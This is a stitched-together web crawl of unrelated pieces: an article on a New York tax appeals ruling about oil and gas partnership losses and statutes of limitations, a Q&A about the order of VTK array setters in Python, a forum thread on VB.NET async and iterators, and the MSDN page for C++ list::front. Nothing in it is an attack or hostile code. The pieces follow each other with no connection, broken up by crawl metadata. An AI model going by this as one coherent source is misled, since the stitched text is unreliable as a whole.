After you’ve installed Emacs, open it. You should see something like Figure 2-2.
Welcome to the cult of Emacs! You’ve made Richard Stallman proud!
Configuration
I’ve created a repository of all the files you need to configure Emacs for Clojure, available at.
NOTE: These tools are constantly being updated, so if the instructions below don't work for you or you want to use the latest configuration, please read the instructions at.
Do the following to delete your existing Emacs configuration and install the Clojure-friendly one:
- Close Emacs.
- Delete ~/.emacs or ~/.emacs.d if they exist. (Windows users, your emacs files will probably live in C:\Users\your_user_name\AppData\Roaming\. So, for example, you would delete C:\Users\jason\AppData\Roaming\.emacs.d.) This is where Emacs looks for configuration files, and deleting these files and directories will ensure that you start with a clean slate.
- Download the Emacs configuration zip file listed above and unzip it. Its contents should be a folder, emacs-for-clojure-book1. Run mv path/to/emacs-for-clojure-book1 ~/.emacs.d.
- Open Emacs.
When you open Emacs, you may see a lot of activity as Emacs downloads a bunch of useful packages. Once the activity stops, go ahead and just quit Emacs, and then open it again. (If you don't see any activity, that's OK! Quit and restart Emacs just for funsies.) After you do so, you should see a window like the one in Figure 2-3.
Now that we’ve got everything set up, let’s learn how to use Emacs!
Emacs Escape Hatch
Before we dig in to the fun stuff, you need to know an important Emacs key binding: ctrl-G. This key binding quits whatever Emacs command you’re trying to run. So if things aren’t going right, hold down ctrl, press G, and then try again. It won’t close Emacs or make you lose any work; it’ll just cancel your current action.
Emacs Buffers
All editing happens in an Emacs buffer. When you first start Emacs, a buffer named
*scratch* is open. Emacs will always show you the name of the current buffer at the bottom of the window, as shown in Figure 2-4.
By default, the
*scratch* buffer handles parentheses and indentation in a way that’s optimal for Lisp development but is inconvenient for writing plain text. Let’s create a fresh buffer so we can play around without having unexpected things happen. To create a buffer, do this:
- Hold down ctrl and press X.
- Release ctrl.
- Press B.
We can express the same sequence in a more compact format: C-x b.
After performing this key sequence, you’ll see a prompt at the bottom of the application, as shown in Figure 2-5.
This area is called the minibuffer, and it is where Emacs prompts you for input. Right now it’s prompting us for a buffer name. You can enter the name of a buffer that is already open, or you can enter a new buffer name. Type in emacs-fun-times and press enter. You should now see a completely blank buffer and can just start typing. You’ll find that keys mostly work the way you’d expect. Characters appear as you type them. The up, down, left, and right arrow keys move you as you’d expect, and enter creates a new line.
You’ll also notice that you’re not suddenly sporting a bushy Unix beard or Birkenstocks (unless you had them to begin with). This should help ease any lingering trepidation you feel about using Emacs. When you’re done messing around, go ahead and kill the buffer by typing C-x k enter. Killing a buffer doesn’t delete anything on disk; buffers aren’t necessarily backed by files, and creating a buffer doesn’t necessarily create a file. Let’s learn about working with files.
Working with Files
The key binding for opening a file in Emacs is C-x C-f. Notice that you’ll need to hold down ctrl when pressing both X and F. After you do that, you’ll get another minibuffer prompt. Navigate to ~/.emacs.d/customizations/ui.el, which customizes the way Emacs looks and how you can interact with it. Emacs opens the file in a new buffer with the same name as the filename. Let’s go to line 37 and uncomment it by removing the leading semicolons. It will look like this:
(setq initial-frame-alist '((top . 0) (left . 0) (width . 120) (height . 80)))
Then change the values for
width and
height, which set the dimensions in characters for the active window. By changing these values, you can set the Emacs window to open at a certain size every time it starts. Try changing the values, then save the buffer with C-x C-s, which writes it back to ~/.emacs.d/customizations/ui.el. You can also try saving your buffer using the key binding you use in other applications (for example, ctrl-S or cmd-S). The Emacs configuration you downloaded should allow that to work, but if it doesn’t, it’s no big deal.
After saving the file, quit Emacs and start it again. I bet it’s very tiny! See my example in Figure 2-6.
Go through that same process a couple of times until Emacs starts at a size that you like. Or just comment out those lines again and be done with it (in which case Emacs will open at its default width and height). If you’re done editing ui.el, you can close its buffer with C-x k. Either way, you’re done saving your first file in Emacs! If something crazy happens, you can follow the instructions in “Configuration” on page 13 to get Emacs working again.
If you want to create a new file, just use C-x C-f and enter the new file’s path. Here’s a quick summary of the key bindings covered so far:
- To switch to an existing buffer, use C-x b and enter the buffer name in the minibuffer.
- To create a new buffer, use C-x b and enter a new buffer name.
- To open a file, use C-x C-f and navigate to the file.
- To save a buffer to a file, use C-x C-s.
- To create a new file, use C-x C-f and enter the new file’s path. When you save the buffer, Emacs will create the file on the filesystem.
Key Bindings and Modes
You’ve already come a long way! You can now use Emacs like a very basic editor. This should help you get by if you ever need to use Emacs on a server or are forced into pairing with an Emacs nerd.
However, to really be productive, it’ll be useful for you to know some key details about key bindings (ha-ha!). Then I’ll introduce Emacs modes. After that, I’ll cover some core terminology and go over a bunch of super useful key bindings. First, a little background: every Emacs key binding is simply a shortcut for running an elisp function (for example, C-x b runs switch-to-buffer), and Emacs goes even further than that. Even simple keystrokes like f and a are bound to a function, in this case
self-insert-command, the command for adding characters to the buffer you’re editing.
From Emacs’s point of view, all functions are created equal, and you can redefine all functions, even core functions like
save-file. You probably won’t want to redefine core functions, but you can.
You can redefine functions because, at its core, Emacs is just a Lisp interpreter that happens to load code-editing facilities. Most of Emacs is written in elisp, so from the perspective of Emacs,
save-file is just a function, as is
switch-to-buffer and almost any other command you can run. Not only that, but any functions you create are treated the same way as built-in functions. You can even use Emacs to execute elisp, modifying Emacs as it runs.
The freedom to modify Emacs using a powerful programming language is what makes Emacs so flexible and why people like me are so crazy about it. Yes, it has a lot of surface-level complexity that can take time to learn. But underlying Emacs is the elegant simplicity of Lisp and the infinite tinkerability that comes with it. This tinkerability isn’t limited to just creating and redefining functions. You can also create, redefine, and remove key bindings. Conceptually, key bindings are just an entry in a lookup table associating keystrokes with functions, and that lookup table is completely modifiable.
You can also run commands by name, without a specific key binding, using M-x function-name (for example, M-x save-buffer). M stands for meta, a key that modern keyboards don’t possess but which is mapped to alt on Windows and Linux and option on Macs. M-x runs the
smex command, which prompts you for the name of another command to be run.
Now that you understand key bindings and functions, you’ll be able to understand what modes are and how they work.
Modes
An Emacs mode is a collection of key bindings and functions that are packaged together to help you be productive when editing different types of files. (Modes also do things like tell Emacs how to do syntax highlighting, but that’s of secondary importance, and I won’t cover that here.)
For example, when you’re editing a Clojure file, you’ll want to load Clojure mode. Right now I’m writing a Markdown file and using Markdown mode, which has lots of useful key bindings specific to working with Markdown. When editing Clojure, it’s best to have a set of Clojure-specific key bindings, like C-c C-k to load the current buffer into a REPL and compile it.
Modes come in two flavors: major modes and minor modes. Markdown mode and Clojure mode are major modes. Major modes are usually set by Emacs when you open a file, but you can also set the mode explicitly by running the relevant Emacs command, for example with
M-x clojure-mode or M-x markdown-mode. Only one major mode is active at a time.
Whereas major modes specialize Emacs for a certain file type or language, minor modes usually provide functionality that’s useful across file types. For example, abbrev mode “automatically expands text based on pre-defined abbreviation definitions” (per the Emacs manual). You can have multiple minor modes active at the same time.
You can see which modes are active on the mode line, as shown in Figure 2-7.
If you open a file and Emacs doesn’t load a major mode for it, chances are that one exists. You’ll just need to download its package. Speaking of which . . .
Installing Packages
Many modes are distributed as packages, which are just bundles of elisp files stored in a package repository. Emacs 24, which you installed at the beginning of this chapter, comes with a package manager that makes it easy to browse and install packages. The “Beginner’s Guide to Emacs” (found at) has a good description of how to load customizations under the section “Loading New Packages” toward the bottom of the article.
Core Editing Terminology and Key Bindings
If all you want to do is use Emacs like a text editor, you can skip this section entirely! But you’ll be missing out on some great stuff. In this section, we’ll go over key Emacs terms; how to select, cut, copy, and paste text; how to select, kill, and yank text (see what I did there? Ha ha ha!); and how to move through the buffer efficiently.
To get started, open a new buffer in Emacs and name it jack-handy. Then enter the following Jack Handy quotations:.
Use this example to experiment with navigation and editing in this section.
Point
If you’ve been following along, you should see a red-orange rectangle in your buffer. This is the cursor, and it marks the position of point, the place where editing commands take effect. If you put point just before the word face and use C-k, all the text from the letter f onward will disappear. C-k runs the command
kill-line, which kills all text after point on the current line (I’ll talk more about killing later). Undo that change with C-/. Also, try your normal OS key binding for undo; that should work as well.
Movement
You can use your arrow keys to move point just like any other editor, but many key bindings allow you to navigate more efficiently, as shown in Table 2-1.
- Table 2-1: Key Bindings for Navigating Text
Go ahead and try out these key bindings in your jack-handy buffer!
Selection with Regions
In Emacs, we don’t select text. We create regions, and we do so by setting the mark with C-spc (ctrl-spacebar). Then, when you move point, everything between mark and point is the region. It’s very similar to shift-selecting text for basic purposes.
For example, do the following in your jack-handy buffer:
- Go to the beginning of the file.
- Use C-spc.
- Use M-f twice. You should see a highlighted region encompassing the first two words, much as if you had selected them while holding shift.
Regions also let you confine an operation to a limited area of the buffer. Try this:
- Create a region encompassing The face of a child can say it all.
- Use M-x replace-string and replace face with head.
This will perform the replacement within the current region rather than the entire buffer after point, which is the default behavior.
Killing and the Kill Ring
In Emacs, we don’t cut or copy text; we kill regions, adding them to the kill ring. Don’t you feel braver and truer knowing that you’re laying waste to untold kilobytes of text? We don’t paste, either; we yank text from the kill ring back into the buffer. More important, Emacs allows you to do tasks that you can’t do with the typical cut/copy/paste clipboard featureset.
Emacs stores multiple blocks of text on the kill ring, and you can cycle through them. This is cool because you can cycle through to retrieve text you killed a long time ago. Let’s see this in action:
- Create a region over the word Treasure in the first line.
- Use M-w, which is bound to the
kill-ring-save command. In general, M-w is like copying. It adds the region to the kill ring without deleting it from your buffer.
- Move point to the word choreography on the last line.
- Use M-d, which is bound to the
kill-word command. This adds choreography to the kill ring and deletes it from your buffer.
- Use C-y. This will yank the text you just killed, choreography, inserting it at point.
- Use M-y. This will remove choreography and yank the next item on the kill ring, Treasure.
You can see some useful kill/yank key bindings in Table 2-2.
- Table 2-2: Key Bindings for Killing and Yanking Text
Editing and Help
Table 2-3 shows some additional, useful, editing key bindings you should know about for dealing with spacing and expanding text.
- Table 2-3: Other Useful Editing Key Bindings
Emacs also has excellent built-in help. The two key bindings shown in Table 2-4 will serve you well.
- Table 2-4: Key Bindings for Built-in Help
The help text appears in a new window, a concept I will cover later in the chapter. For now, you can close help windows by pressing C-x o q.
Using Emacs with Clojure
Next, I’ll explain how to use Emacs to efficiently develop a Clojure application. You’ll learn how to start a REPL process that’s connected to Emacs and how to work with Emacs windows. Then I’ll cover a cornucopia of useful key bindings for evaluating expressions, compiling files, and performing other handy tasks. Finally, I’ll show you how to handle Clojure errors and introduce some features of Paredit, an optional minor mode, which is useful for writing and editing code in Lisp-style languages.
If you want to start digging in to Clojure code, please do skip ahead! You can always return later.
Fire Up Your REPL!
As you learned in Chapter 1, a REPL allows you to interactively write and run Clojure code. The REPL is a running Clojure program that gives you a prompt and then reads your input, evaluates it, prints the result, and loops back to the prompt. In Chapter 1, you started the REPL in a terminal window with
lein repl. In this section, you’ll start a REPL directly in Clojure.
To connect Emacs to a REPL, you’ll use the Emacs package CIDER, available at. If you followed the configuration instructions earlier in this chapter, you should already have it installed, but you can also install it by running M-x package-install, entering cider, and pressing enter.
CIDER allows you to start a REPL within Emacs and provides you with key bindings that allow you to interact with the REPL more efficiently. Go ahead and start a REPL session now. Using Emacs, open the file clojure-noob/src/clojure_noob/core.clj, which you created in Chapter 1. Next, use M-x cider-jack-in. This starts the REPL and creates a new buffer where you can interact with it. After a short wait (it should be less than a minute), you should see something like Figure 2-8.
Now we have two windows: our core.clj file is open on the left, and the REPL is running on the right. If you’ve never seen Emacs split in half like this, don’t worry! I’ll talk about how Emacs splits windows in a second. In the meantime, try evaluating some code in the REPL. Type in the following bolded lines. The result that you should see printed in the REPL when you press enter is shown after each line of code. Don’t worry about the code at this time; I’ll cover all these functions in the next chapter.
(+ 1 2 3 4)
; => 10

(map inc [1 2 3 4])
; => (2 3 4 5)

(reduce + [5 6 100])
; => 111
Pretty nifty! You can use this REPL just as you used
lein repl in the first chapter. You can also do a whole lot more, but before I go into that, I’ll explain how to work with split-screen Emacs.
Interlude: Emacs Windows and Frames
Let’s take a quick detour to talk about how Emacs handles frames and windows, and to go over some useful window-related key bindings. Feel free to skip this section if you’re already familiar with Emacs windows.
Emacs was invented in, like, 1802 or something, so it uses terminology slightly different from what you’re used to. What you would normally refer to as a window, Emacs calls a frame, and the frame can be split into multiple windows. Splitting into multiple windows allows you to view more than one buffer at a time. You already saw this happen when you ran
cider-jack-in (see Figure 2-9).
Table 2-5 shows several key bindings for working with the frame and windows.
- Table 2-5: Emacs Window Key Bindings
I encourage you to try the Emacs window key bindings. For example, put your cursor in the left window, the one with the Clojure file, and use C-x 1. The other window should disappear, and you should see only the Clojure code. Then do the following:
- Use C-x 3 to split the window side by side again.
- Use C-x o to switch to the right window.
- Use C-x b *cider-repl* to switch to the CIDER buffer in the right window.
Once you’ve experimented a bit, set up Emacs so that it contains two side-by-side windows with Clojure code on the left and the CIDER buffer on the right, as in the previous images. If you’re interested in learning more about windows and frames, the Emacs manual has a ton of info: see.
Now that you can navigate Emacs windows, it’s time to learn some Clojure development key bindings!
A Cornucopia of Useful Key Bindings
Now you’re ready to learn some key bindings that will reveal the true power of using Emacs for Clojure projects. These commands will let you evaluate, tweak, compile, and run code with just a few dainty keystrokes. Let’s start by going over how to quickly evaluate an expression.
At the bottom of core.clj, add the following:
(println "Cleanliness is next to godliness")
Now use C-e to navigate to the end of the line, and then use C-x C-e. The text
Cleanliness is next to godliness should appear in the CIDER buffer, as shown in Figure 2-10.
The key binding C-x C-e runs the command
cider-eval-last-expression. As the name suggests, this command sends the expression immediately preceding point to the REPL, which then evaluates the expression. You can also try C-u C-x C-e, which prints the result of the evaluation after point.
Now let’s try to run the
-main function we wrote in Chapter 1 so we can let the world know that we’re little teapots.
In the core.clj buffer, use C-c M-n M-n. This key binding sets the namespace to the namespace listed at the top of your current file, so the prompt in the right window should now read
clojure-noob.core>. I haven’t gone into detail about namespaces yet, but for now it’s enough to know that a namespace is an organizational mechanism that allows us to avoid naming conflicts. Next, enter (-main) at the prompt. The REPL should print
I'm a little teapot! How exciting!
Now let’s create a new function and run it. At the bottom of core.clj, add the following:
(defn train [] (println "Choo choo!"))
When you’re done, save your file and use C-c C-k to compile your current file within the REPL session. (You have to compile your code for the REPL to be aware of your changes.) Now if you run
(train) in the REPL, it will echo back
Choo choo!.
While still in the REPL, try C-↑ (ctrl plus the up arrow key). C-↑ and C-↓ cycle through your REPL history, which includes all the Clojure expressions that you’ve asked the REPL to evaluate.
Note for Mac users: by default, OS X maps C-↑, C-↓, C-←, and C-→ to Mission Control commands. You can change your Mac key bindings by opening System Preferences, and then going to Keyboard > Shortcuts > Mission Control.
Finally, try this:
- Type (-main at the REPL prompt. Note the lack of a closing parenthesis.
- Press C-enter.
CIDER should close the parenthesis and evaluate the expression. This is just a nice little convenience that CIDER provides for dealing with so many parentheses.
CIDER also has a few key bindings that are great when you’re learning Clojure. Pressing C-c C-d C-d will display documentation for the symbol under point, which can be a huge time-saver. When you’re done with the documentation, press q to close the documentation buffer. The key binding M-. will navigate to the source code for the symbol under point, and M-, will return you to your original buffer and position. Finally, C-c C-d C-a lets you search for arbitrary text across function names and documentation. This is a great way to find a function when you can’t exactly remember its name.
The CIDER README () has a comprehensive list of key bindings that you can learn over time, but for now, Tables 2-6 and 2-7 contain a summary of the key bindings we just went over.
- Table 2-6: Clojure Buffer Key Bindings
- Table 2-7: CIDER Buffer Key Bindings
How to Handle Errors
In this section, you’ll write some buggy code so you can see how Emacs responds to it and how you can recover from the error and continue on your merry way. You’ll do this in both the REPL buffer and the core.clj buffer. Let’s start with the REPL. At the prompt, type (map) and press enter. You should see something like Figure 2-11.
As you can see, calling
map with no arguments causes Clojure to lose its mind—it shows an
ArityException error message in your REPL buffer and fills your left window with text that looks like the ravings of a madman. These ravings are the stack trace, which shows the function that actually threw the exception, along with which function called that function, down the stack of function calls.
Clojure’s stack traces can be difficult to decipher when you’re just starting, but after a while you’ll learn to get useful information from them. CIDER gives you a hand by allowing you to filter stack traces, which reduces noise so you can zero in on the cause of your exception. Line 2 of the
*cider-error* buffer has the filters Clojure, Java, REPL, Tooling, Duplicates, and All. You can click each option to activate that filter. You can also click each stack trace line to jump to the corresponding source code.
Here’s how to close the stack trace in the left window:
- Use C-x o to switch to the window.
- Press q to close the stack trace and go back to CIDER.
If you want to view the error again, you can switch to the
*cider-error* buffer. You can also get error messages when trying to compile files. To see this, go to the core.clj buffer, write some buggy code, and compile:
- Add
(map)to the end.
- Use C-c C-k to compile.
You should see a
*cider-error* buffer similar to the one you saw earlier. Again, press q to close the stack trace.
Paredit
While writing code in the Clojure buffer, you may have noticed some unexpected things happening. For example, every time you type a left parenthesis, a right parenthesis immediately gets inserted.
This occurs thanks to paredit-mode, a minor mode that turns Lisp’s profusion of parentheses from a liability into an asset. Paredit ensures that all parentheses, double quotes, and brackets are closed, relieving you of that odious burden.
Paredit also offers key bindings to easily navigate and alter the structure created by all those parentheses. In the next section, I’ll go over the most useful key bindings, but you can also check out a comprehensive cheat sheet at(in the cheat sheet, the red pipe represents point).
However, if you’re not used to it, paredit can sometimes be annoying. I think it’s more than worth your while to take some time to learn it, but you can always disable it with M-x paredit-mode, which toggles the mode on and off.
The following section shows you the most useful key bindings.
Wrapping and Slurping
Wrapping surrounds the expression after point with parentheses. Slurping moves a closing parenthesis to include the next expression to the right. For example, say we start with this:
(+ 1 2 3 4)
and we want to get this:
(+ 1 (* 2 3) 4)
We can wrap the
2, add an asterisk, and then slurp the
3. First, place point, which is represented here as a vertical pipe,
|:
(+ 1 |2 3 4)
Then type M-(, the binding for paredit-wrap-round, getting this result:
(+ 1 (|2) 3 4)
Add the asterisk and a space:
(+ 1 (* |2) 3 4)
To slurp in the
3, press C-→:
(+ 1 (* |2 3) 4)
This makes it easy to add and extend parentheses without wasting precious moments holding down arrow keys to move point.
Barfing
Suppose, in the preceding example, you accidentally slurped the four. To unslurp it (also known as barfing), place your cursor (
|) anywhere in the inner parentheses:
(+ 1 (|* 2 3 4))
Then use C-←:
(+ 1 (|* 2 3) 4)
Ta-da! Now you know how to expand and contract parentheses at will.
Navigation
Often when writing in a Lisp dialect, you’ll work with expressions like this:
(map (comp record first) (d/q '[:find ?post :in $ ?search :where [(fulltext $ :post/content ?search) [[?post ?content]]]] (db/db) (:q params)))
With this kind of expression, it’s useful to jump quickly from one subexpression to the next. If you put point right before an opening parenthesis, C-M-f will take you to the closing parenthesis. Similarly, if point is right after a closing parenthesis, C-M-b will take you to the opening parenthesis.
Table 2-8 summarizes the paredit key bindings you just learned.
- Table 2-8: Paredit Key Bindings
Continue Learning
Emacs is one of the longest-lived editors, and its adherents often approach fanaticism in their enthusiasm for it. It can be awkward to use at first, but stick with it and you will be amply rewarded over your lifetime.
Whenever I open Emacs, I feel inspired. Like a craftsman entering his workshop, I feel a realm of possibility open before me. I feel the comfort of an environment that has evolved over time to fit me perfectly—an assortment of packages and key bindings that help me bring ideas to life day after day.
These resources will help you as you continue on your Emacs journey:
- The Emacs Manual provides excellent, comprehensive instructions. Spend some time with it every morning! Download the PDF and read it on the go:.
- The Emacs Reference Card is a handy cheat sheet:.
- Mastering Emacs by Mickey Petersen is one of the best Emacs resources available. Start with the reading guide:.
- For the more visually minded folks, I recommend the hand-drawn “How to Learn Emacs: A Beginner’s Guide to Emacs 24 or Later” by Sacha Chua:.
- Just press C-h t for the built-in tutorial.
Summary
Whew! You’ve covered a lot of ground. You now know about Emacs’s true nature as a Lisp interpreter. Key bindings act as shortcuts to execute elisp functions, and modes are collections of key bindings and functions. You learned how to interact with Emacs on its own terms and mastered buffers, windows, regions, killing, and yanking. Finally, you learned how to easily work with Clojure using CIDER and paredit.
With all of this hard-won Emacs knowledge under your belt, it’s time to start learning Clojure in earnest!
|
https://www.braveclojure.com/basic-emacs/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
A Flutter plugin for jumping to system settings.
To use this plugin, add
system_setting as a dependency in your pubspec.yaml file.
For iOS,
SettingTarget will not have any effect. It will always go to app setting.
import 'package:flutter/material.dart';
import 'package:system_setting/system_setting.dart';

void main() => runApp(MaterialApp(
      home: Scaffold(
        body: Center(
          child: RaisedButton(
            onPressed: _jumpToSetting,
            child: Text('Goto setting'),
          ),
        ),
      ),
    ));

_jumpToSetting() {
  SystemSetting.goto(SettingTarget.WIFI);
}
## 0.1.2
Documentation update
## 0.1.1
Add support for iOS.
Add support for jumping to app-specific setting in Android.
Initial release.
example/README.md
Demonstrates how to use the system_setting plugin.
For help getting started with Flutter, view our online documentation.
Add this to your package's pubspec.yaml file:
dependencies: system_setting: ^0.1.2
You can install packages from the command line:
with Flutter:
$ flutter packages get
Alternatively, your editor might support
flutter packages get.
Check the docs for your editor to learn more.
Now in your Dart code, you can use:
import 'package:system_setting/system_setting.dart';
|
https://pub.dartlang.org/packages/system_setting
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
How to Calculate Levenshtein Distance in Java?
Last modified: November 3, 2018
1. Introduction
In this article, we describe the Levenshtein distance, alternatively known as the Edit distance. The algorithm explained here was devised by a Russian scientist, Vladimir Levenshtein, in 1965.
We’ll provide an iterative and a recursive Java implementation of this algorithm.
2. What is the Levenshtein Distance?
The Levenshtein distance is a measure of dissimilarity between two Strings. Mathematically, given two Strings x and y, the distance measures the minimum number of character edits required to transform x into y.
Typically three type of edits are allowed:
- Insertion of a character c
- Deletion of a character c
- Substitution of a character c with c‘
Example: If x = ‘shot’ and y = ‘spot’, the edit distance between the two is 1 because ‘shot’ can be converted to ‘spot’ by substituting ‘h‘ to ‘p‘.
In certain sub-classes of the problem, the cost associated with each type of edit may be different.
For example, less cost for substitution with a character located nearby on the keyboard and more cost otherwise. For simplicity, we’ll consider all costs to be equal in this article.
Some of the applications of edit distance are:
- Spell Checkers – detecting spelling errors in text and find the closest correct spelling in dictionary
- Plagiarism Detection (refer – IEEE Paper)
- DNA Analysis – finding similarity between two sequences
- Speech Recognition (refer – Microsoft Research)
3. Algorithm Formulation
Let’s take two Strings x and y of lengths m and n respectively. We can denote each String as x[1:m] and y[1:n].
We know that at the end of the transformation, both Strings will be of equal length and have matching characters at each position. So, if we consider the first character of each String, we’ve got three options:
- Substitution:
- Determine the cost (D1) of substituting x[1] with y[1]. The cost of this step would be zero if both characters are same. If not, then the cost would be one
- After step 1.1, we know that both Strings start with the same character. Hence the total cost would now be the sum of the cost of step 1.1 and the cost of transforming the rest of the String x[2:m] into y[2:n]
- Insertion:
- Insert a character in x to match the first character in y, the cost of this step would be one
- After 2.1, we have processed one character from y. Hence the total cost would now be the sum of the cost of step 2.1 (i.e., 1) and the cost of transforming the full x[1:m] to remaining y (y[2:n])
- Deletion:
- Delete the first character from x, the cost of this step would be one
- After 3.1, we have processed one character from x, but the full y remains to be processed. The total cost would be the sum of the cost of 3.1 (i.e., 1) and the cost of transforming remaining x to the full y
The next part of the solution is to figure out which option to choose out of these three. Since we do not know which option would lead to minimum cost at the end, we must try all options and choose the best one.
4. Naive Recursive Implementation
We can see that the second step of each option in section #3 is mostly the same edit distance problem but on sub-strings of the original Strings. This means after each iteration we end up with the same problem but with smaller Strings.
This observation is the key to formulate a recursive algorithm. The recurrence relation can be defined as:
D(x[1:m], y[1:n]) = min {
D(x[2:m], y[2:n]) + Cost of Replacing x[1] to y[1],
D(x[1:m], y[2:n]) + 1,
D(x[2:m], y[1:n]) + 1
}
We must also define base cases for our recursive algorithm, which in our case is when one or both Strings become empty:
- When both Strings are empty, then the distance between them is zero
- When one of the Strings is empty, then the edit distance between them is the length of the other String, as we need that many numbers of insertions/deletions to transform one into the other:
- Example: if one String is “dog” and other String is “” (empty), we need either three insertions in empty String to make it “dog”, or we need three deletions in “dog” to make it empty. Hence the edit distance between them is 3
A naive recursive implementation of this algorithm:
import java.util.Arrays;

public class EditDistanceRecursive {

    static int calculate(String x, String y) {
        if (x.isEmpty()) {
            return y.length();
        }
        if (y.isEmpty()) {
            return x.length();
        }
        int substitution = calculate(x.substring(1), y.substring(1))
            + costOfSubstitution(x.charAt(0), y.charAt(0));
        int insertion = calculate(x, y.substring(1)) + 1;
        int deletion = calculate(x.substring(1), y) + 1;
        return min(substitution, insertion, deletion);
    }

    public static int costOfSubstitution(char a, char b) {
        return a == b ? 0 : 1;
    }

    public static int min(int... numbers) {
        return Arrays.stream(numbers)
            .min().orElse(Integer.MAX_VALUE);
    }
}
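As a quick sanity check, the “shot”/“spot” example from Section 2 should produce a distance of 1, and the empty-String base case a distance of 3. This main method is an illustrative harness, not part of the article’s listing:
public static void main(String[] args) {
    System.out.println(EditDistanceRecursive.calculate("shot", "spot")); // prints 1
    System.out.println(EditDistanceRecursive.calculate("", "dog"));      // prints 3
}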
This algorithm has exponential complexity. At each step, we branch off into three recursive calls, resulting in O(3^n) complexity.
In the next section, we’ll see how to improve upon this.
5. Dynamic Programming Approach
On analyzing the recursive calls, we observe that the arguments for sub-problems are suffixes of the original Strings. This means there can only be m*n unique recursive calls (where m and n are a number of suffixes of x and y). Hence the complexity of the optimal solution should be quadratic, O(m*n).
Lets look at some of the sub-problems (according to recurrence relation defined in section #4):
- Sub-problems of D(x[1:m], y[1:n]) are D(x[2:m], y[2:n]), D(x[1:m], y[2:n]) and D(x[2:m], y[1:n])
- Sub-problems of D(x[1:m], y[2:n]) are D(x[2:m], y[3:n]), D(x[1:m], y[3:n]) and D(x[2:m], y[2:n])
- Sub-problems of D(x[2:m], y[1:n]) are D(x[3:m], y[2:n]), D(x[2:m], y[2:n]) and D(x[3:m], y[1:n])
In all three cases, one of the sub-problems is D(x[2:m], y[2:n]). Instead of calculating this three times like we do in the naive implementation, we can calculate this once and reuse the result whenever needed again.
This problem has a lot of overlapping sub-problems, but if we know the solution to the sub-problems, we can easily find the answer to the original problem. Therefore, we have both of the properties needed for formulating a dynamic programming solution, i.e., Overlapping Sub-Problems and Optimal Substructure.
We can optimize the naive implementation by introducing memoization, i.e., store the result of the sub-problems in an array and reuse the cached results.
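A possible top-down (memoized) version is sketched below. It mirrors the naive implementation but caches each result, indexed by the remaining lengths of the two Strings; the costOfSubstitution and min helpers are assumed to be the ones from the earlier listing, and java.util.Arrays must be imported:
static int calculateMemoized(String x, String y) {
    int[][] memo = new int[x.length() + 1][y.length() + 1];
    for (int[] row : memo) {
        Arrays.fill(row, -1); // -1 marks a sub-problem not solved yet
    }
    return calculate(x, y, memo);
}

static int calculate(String x, String y, int[][] memo) {
    // The suffix lengths uniquely identify the sub-problem.
    if (memo[x.length()][y.length()] != -1) {
        return memo[x.length()][y.length()];
    }
    int result;
    if (x.isEmpty()) {
        result = y.length();
    } else if (y.isEmpty()) {
        result = x.length();
    } else {
        int substitution = calculate(x.substring(1), y.substring(1), memo)
            + costOfSubstitution(x.charAt(0), y.charAt(0));
        int insertion = calculate(x, y.substring(1), memo) + 1;
        int deletion = calculate(x.substring(1), y, memo) + 1;
        result = min(substitution, insertion, deletion);
    }
    memo[x.length()][y.length()] = result;
    return result;
}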
Alternatively, we can also implement this iteratively by using a table based approach:
static int calculate(String x, String y) {
    int[][] dp = new int[x.length() + 1][y.length() + 1];

    for (int i = 0; i <= x.length(); i++) {
        for (int j = 0; j <= y.length(); j++) {
            if (i == 0) {
                dp[i][j] = j;
            } else if (j == 0) {
                dp[i][j] = i;
            } else {
                dp[i][j] = min(dp[i - 1][j - 1]
                        + costOfSubstitution(x.charAt(i - 1), y.charAt(j - 1)),
                    dp[i - 1][j] + 1,
                    dp[i][j - 1] + 1);
            }
        }
    }

    return dp[x.length()][y.length()];
}
This algorithm performs significantly better than the recursive implementation. However, it consumes O(m*n) memory for the table.
This can be optimized further by observing that we only need the values of three adjacent cells to fill the current cell, so keeping just two rows of the table suffices, as the sketch below shows.
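A minimal sketch of that space optimization (again assuming the costOfSubstitution and min helpers from above; the method name is ours):
static int calculateTwoRows(String x, String y) {
    int[] prev = new int[y.length() + 1];
    int[] curr = new int[y.length() + 1];

    // first row: distance from an empty prefix of x to each prefix of y
    for (int j = 0; j <= y.length(); j++) {
        prev[j] = j;
    }

    for (int i = 1; i <= x.length(); i++) {
        curr[0] = i;
        for (int j = 1; j <= y.length(); j++) {
            curr[j] = min(prev[j - 1] + costOfSubstitution(x.charAt(i - 1), y.charAt(j - 1)),
              prev[j] + 1,
              curr[j - 1] + 1);
        }
        // swap the row buffers instead of allocating new ones
        int[] tmp = prev;
        prev = curr;
        curr = tmp;
    }

    return prev[y.length()];
}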
6. Conclusion
In this article, we described what Levenshtein distance is and how it can be calculated using recursive and dynamic-programming based approaches.
Levenshtein distance is only one measure of string similarity; others include Cosine Similarity (which uses a token-based approach and treats the strings as vectors) and the Dice Coefficient.
As always, the full implementation of the examples can be found over on GitHub.
|
https://www.baeldung.com/java-levenshtein-distance
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
The deductibility of a deceased individual’s losses from investments in oil and gas partnerships, and the Tax Department’s ability to assess income tax after the three-year statute of limitations has closed, is the subject of an interesting recent decision by a New York State Administrative Law Judge. The decision addresses whether the taxpayer filed false or fraudulent returns (for which there is no statute of limitations) and whether the deficiency was attributable to an “abusive tax avoidance transaction” (for which there is a six-year statute of limitations). Matter of Richard Siegal (Estate of), Gail Siegal, Administrator, DTA Nos. 826661 & 826750 (N.Y.S. Div. of Tax App., Feb. 15, 2018).
Facts. Richard Siegal (now deceased) was a New York resident during the tax years 2001 and 2002. He had been involved in the oil and gas industry since the 1970s and created partnerships to participate in oil and gas ventures. For the years in issue, he was a general partner in several oil and gas partnerships that generated losses, principally through the deduction of intangible drilling costs. The taxpayer reported his distributive shares of those losses for both federal and New York State personal income tax (“PIT”) purposes. In 2003, following an audit of those partnerships by the Department’s Tax Shelter Unit for the years 2000 and 2001, the Department concluded its audit without adjustment and notified the taxpayer that no further action was required with respect to his New York State returns.
